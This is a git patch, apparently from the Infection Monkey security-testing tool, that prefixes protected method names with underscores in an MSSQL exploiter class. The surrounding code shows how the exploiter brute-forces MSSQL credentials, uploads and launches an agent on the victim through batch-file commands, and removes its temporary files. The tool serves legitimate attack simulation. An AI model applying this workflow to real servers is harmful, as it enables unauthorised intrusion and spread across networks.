From 0204ba6343a5a4c07cf898451253f2bf63b03d3d Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Tue, 14 Jun 2022 14:27:21 -0400 Subject: [PATCH] Agent: Prefix protected methods in MSSQLExploiter with "_" --- monkey/infection_monkey/exploit/mssqlexec.py | 24 ++++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 7dbb190a1..700891c8f 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -58,7 +58,7 @@ class MSSQLExploiter(HostExploiter): self.options["credentials"]["exploit_password_list"], ) try: - self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds) + self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds) except FailedExploitationError: logger.info( f"Failed brute-forcing of MSSQL server on {self.host}," @@ -72,15 +72,15 @@ class MSSQLExploiter(HostExploiter): try: # Create dir for payload - self.create_temp_dir() + self._create_temp_dir() - http_thread = self.start_monkey_server(monkey_path_on_victim) - self.upload_monkey(monkey_path_on_victim) + http_thread = self._start_monkey_server(monkey_path_on_victim) + self._upload_monkey(monkey_path_on_victim) MSSQLExploiter._stop_monkey_server(http_thread) self.run_monkey(monkey_path_on_victim) - self.remove_temp_dir() + self._remove_temp_dir() except Exception as e: error_message = ( f"An unexpected error occurred when trying " @@ -95,13 +95,13 @@ class MSSQLExploiter(HostExploiter): self.exploit_result.propagation_success = True return self.exploit_result - def create_temp_dir(self): + def _create_temp_dir(self): logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}") mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}" self._run_mssql_command(mkdir_command) - def upload_monkey(self, monkey_path_on_victim: PureWindowsPath): + def _upload_monkey(self, monkey_path_on_victim: PureWindowsPath): self._write_download_command_to_batch_file(monkey_path_on_victim) self.run_payload_file() @@ -131,21 +131,21 @@ class MSSQLExploiter(HostExploiter): self.run_payload_file() def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim): - agent_launch_command = self.get_monkey_launch_command(monkey_path_on_victim) + agent_launch_command = self._get_monkey_launch_command(monkey_path_on_victim) self._write_command_to_batch_file(agent_launch_command) - def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): + def _get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath): monkey_args = build_monkey_commandline( self.host, self.current_depth - 1, monkey_path_on_victim ) return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}" - def remove_temp_dir(self): + def _remove_temp_dir(self): self._run_mssql_command(f"del {self.payload_file_path}") self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}") - def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: + def _start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer: self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(monkey_path_on_victim), self.agent_repository ) @@ -156,7 +156,7 @@ class MSSQLExploiter(HostExploiter): http_thread.stop() http_thread.join(LONG_REQUEST_TIMEOUT) - def brute_force(self, host, port, users_passwords_pairs_list): + def _brute_force(self, host, port, users_passwords_pairs_list): """ Starts the brute force connection attempts and if needed then init the payload process. Main loop starts here.